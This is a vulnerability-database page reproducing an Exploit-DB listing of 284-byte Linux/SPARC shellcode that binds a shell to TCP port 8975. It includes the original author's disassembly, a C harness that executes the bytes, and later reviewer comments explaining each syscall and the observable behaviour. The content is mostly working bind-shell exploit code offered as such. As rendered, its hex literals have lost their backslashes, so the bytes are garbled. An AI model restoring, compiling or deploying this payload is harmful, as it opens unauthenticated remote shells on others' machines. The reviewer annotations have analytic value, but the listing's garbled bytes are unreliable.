Linux/SPARC – Bind (8975/TCP) Shell + Null-Free Shellcode (284 bytes)


漏洞ID 1054613 漏洞类型
发布时间 2004-09-12 更新时间 2004-09-12
CVE编号 N/A
CNNVD-ID N/A
漏洞平台 Linux_SPARC CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/13306
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
 * 0-day portbind shellcode for all those Sun machines running linux..
 * Coded from scratch, so i take all the credits.
 * It simply binds a pretty shell in port 8975/tcp enjoy.
 * no nulls, no fork, no shit, couldn't be more optimized.
 * enjoy!.
 *
 * Arch   : Sparc
 * OS     : Linux
 * Task   : Portbind
 * Length : 284 Bytes
 *
 * Copyright 2002 killah @ hack . gr
 * All rights reserved.
 *
 */

/* Label printed by the test harness in main(). */
#define NAME "Sparc Linux Portbind"

/*
 * Payload bytes for a Linux/SPARC TCP bind shell, one 32-bit instruction per
 * literal, with the author's disassembly alongside.
 *
 * NOTE(review): as rendered on this page the "\" that should precede each
 * "x" is missing, so these literals are plain ASCII text ("x9dxe3...") and
 * not the 284 bytes of machine code the header describes.
 *
 * Behaviour, read from the disassembly (syscall numbers are the 32-bit
 * Linux/SPARC ones; "ta 0x10" is the syscall trap):
 *   1. socket(AF_INET, SOCK_STREAM, 0)           via socketcall (0xce = 206)
 *   2. bind() to port 0x230f = 8975, address cleared (0.0.0.0)
 *   3. listen() with backlog 5
 *   4. accept() of one connection (no loop and no fork in the code)
 *   5. dup2() (0x5a = 90) of the accepted socket onto fds 0, 1 and 2
 *   6. execve() (0x3b = 59) of "/bin/sh" with argv = { path, NULL }, envp = 0
 *
 * What a defender would observe: the host process opens a listener on
 * 8975/tcp on all interfaces, and after the first connection its image is
 * replaced by /bin/sh whose stdin/stdout/stderr are that socket. No
 * setuid-family call appears, so the shell keeps whatever credentials the
 * host process already had.
 */
char portbind[]=
  // Open a register window and a 136-byte stack frame for scratch space.
  "x9dxe3xbfx78"	//	save  %sp, -136, %sp

  // socketcall(1 = SYS_SOCKET, args at %sp+0x44 = {2, 1, 0}):
  // socket(AF_INET, SOCK_STREAM, 0).
  "x90x10x20x02"	//	mov  2, %o0
  "x92x10x20x01"	//	mov  1, %o1
  "x94x22x80x0a"	//	sub  %o2, %o2, %o2
  "xd0x23xa0x44"	//	st  %o0, [ %sp + 0x44 ]
  "xd2x23xa0x48"	//	st  %o1, [ %sp + 0x48 ]
  "xd4x23xa0x4c"	//	st  %o2, [ %sp + 0x4c ]
  "x90x10x20x01"	//	mov  1, %o0
  "x92x03xa0x44"	//	add  %sp, 0x44, %o1
  "x82x10x20xce"	//	mov  0xce, %g1
  "x91xd0x20x10"	//	ta  0x10
  // Keep the listening descriptor at %fp-12.
  "xd0x27xbfxf4"	//	st  %o0, [ %fp + -12 ]

  // Build the socket address at %fp-40: family 2 (AF_INET), then the low
  // 16 bits of 0x2323230f = 0x230f = port 8975, then a zeroed address word.
  "x90x10x20x02"	//	mov  2, %o0
  "xd0x37xbfxd8"	//	sth  %o0, [ %fp + -40 ]
  "x13x08xc8xc8"	//	sethi  %hi(0x23232000), %o1
  "x90x12x63x0f"	//	or  %o1, 0x30f, %o0
  "xd0x37xbfxda"	//	sth  %o0, [ %fp + -38 ]
  "xc0x27xbfxdc"	//	clr  [ %fp + -36 ]

  // socketcall(2 = SYS_BIND, {fd, %fp-40, 0x10}).
  "x92x07xbfxd8"	//	add  %fp, -40, %o1
  "xd0x07xbfxf4"	//	ld  [ %fp + -12 ], %o0
  "x94x10x20x10"	//	mov  0x10, %o2
  "xd0x23xa0x44"	//	st  %o0, [ %sp + 0x44 ]
  "xd2x23xa0x48"	//	st  %o1, [ %sp + 0x48 ]
  "xd4x23xa0x4c"	//	st  %o2, [ %sp + 0x4c ]
  "x90x10x20x02"	//	mov  2, %o0
  "x92x03xa0x44"	//	add  %sp, 0x44, %o1
  "x82x10x20xce"	//	mov  0xce, %g1
  "x91xd0x20x10"	//	ta  0x10

  // socketcall(4 = SYS_LISTEN, {fd, 5}).
  "xd0x07xbfxf4"	//	ld  [ %fp + -12 ], %o0
  "x92x10x20x05"	//	mov  5, %o1
  "xd0x23xa0x44"	//	st  %o0, [ %sp + 0x44 ]
  "xd2x23xa0x48"	//	st  %o1, [ %sp + 0x48 ]
  "x90x10x20x04"	//	mov  4, %o0
  "x92x03xa0x44"	//	add  %sp, 0x44, %o1
  "x82x10x20xce"	//	mov  0xce, %g1
  "x91xd0x20x10"	//	ta  0x10

  // socketcall(5 = SYS_ACCEPT, {fd, %fp-40, %fp-20}); blocks until a peer
  // connects.
  "x92x07xbfxd8"	//	add  %fp, -40, %o1
  "x94x07xbfxec"	//	add  %fp, -20, %o2
  "xd0x07xbfxf4"	//	ld  [ %fp + -12 ], %o0
  "xd0x23xa0x44"	//	st  %o0, [ %sp + 0x44 ]
  "xd2x23xa0x48"	//	st  %o1, [ %sp + 0x48 ]
  "xd4x23xa0x4c"	//	st  %o2, [ %sp + 0x4c ]
  "x90x10x20x05"	//	mov  5, %o0
  "x92x03xa0x44"	//	add  %sp, 0x44, %o1
  "x82x10x20xce"	//	mov  0xce, %g1
  "x91xd0x20x10"	//	ta  0x10
  // Keep the connected descriptor at %fp-16.
  "xd0x27xbfxf0"	//	st  %o0, [ %fp + -16 ]

  // dup2(connected fd, 0), then 1, then 2: the peer's socket becomes
  // stdin, stdout and stderr.
  "xd0x07xbfxf0"	//	ld  [ %fp + -16 ], %o0
  "x92x22x40x09"	//	sub  %o1, %o1, %o1
  "x82x10x20x5a"	//	mov  0x5a, %g1
  "x91xd0x20x10"	//	ta  0x10
  "xd0x07xbfxf0"	//	ld  [ %fp + -16 ], %o0
  "x92x10x20x01"	//	mov  1, %o1
  "x82x10x20x5a"	//	mov  0x5a, %g1
  "x91xd0x20x10"	//	ta  0x10
  "xd0x07xbfxf0"	//	ld  [ %fp + -16 ], %o0
  "x92x10x20x02"	//	mov  2, %o1
  "x82x10x20x5a"	//	mov  0x5a, %g1
  "x91xd0x20x10"	//	ta  0x10

  // %l6:%l7 = 0x2f62696e 0x2f736800 = "/bin" "/sh\0", stored on the stack
  // followed by argv = { pointer to that string, NULL }; %o2 (envp) is
  // zeroed. Then execve (0x3b = 59), which replaces the process image.
  "x2dx0bxd8x9a"	//	sethi  %hi(0x2f626800), %l6
  "xacx15xa1x6e"	//	or  %l6, 0x16e, %l6
  "x2fx0bxdcxda"	//	sethi  %hi(0x2f736800), %l7
  "x90x0bx80x0e"	//	and  %sp, %sp, %o0
  "x92x03xa0x08"	//	add  %sp, 8, %o1
  "x94x22x80x0a"	//	sub  %o2, %o2, %o2
  "x9cx03xa0x10"	//	add  %sp, 0x10, %sp
  "xecx3bxbfxf0"	//	std  %l6, [ %sp + -16 ]
  "xd0x23xbfxf8"	//	st  %o0, [ %sp + -8 ]
  "xc0x23xbfxfc"	//	clr  [ %sp + -4 ]
  "x82x10x20x3b"	//	mov  0x3b, %g1
  "x91xd0x20x10";	//	ta  0x10

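/*
 * Test harness from the original listing: prints the length of portbind[]
 * and then calls the array through a function pointer.
 *
 * Calling an object through a cast function pointer is undefined behaviour
 * in ISO C. It transfers control only where the memory holding portbind[]
 * is mapped executable; a writable file-scope array is typically placed in
 * a data mapping, and where that mapping is non-executable the call faults
 * instead.
 *
 * The listing includes no headers, so printf(), strlen() and exit() are
 * implicitly declared; a C99 or later compiler needs <stdio.h>, <string.h>
 * and <stdlib.h>.
 *
 * exit(0) is reached only if the call through funct returns.
 */
int
main(void)
{
  int (*funct)();

  funct = (int (*)()) portbind;
  /*
   * strlen() returns size_t, so the conversion is %zu; the original "%d"
   * was a type mismatch (undefined behaviour, wrong value on LP64). The
   * "\n" and "\t" escapes had lost their backslashes on this page.
   */
  printf("%s shellcode\n\tSize = %zu\n", NAME, strlen(portbind));
  (*funct)();
  exit(0);
}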


/* EOF */

// milw0rm.com [2004-09-12]
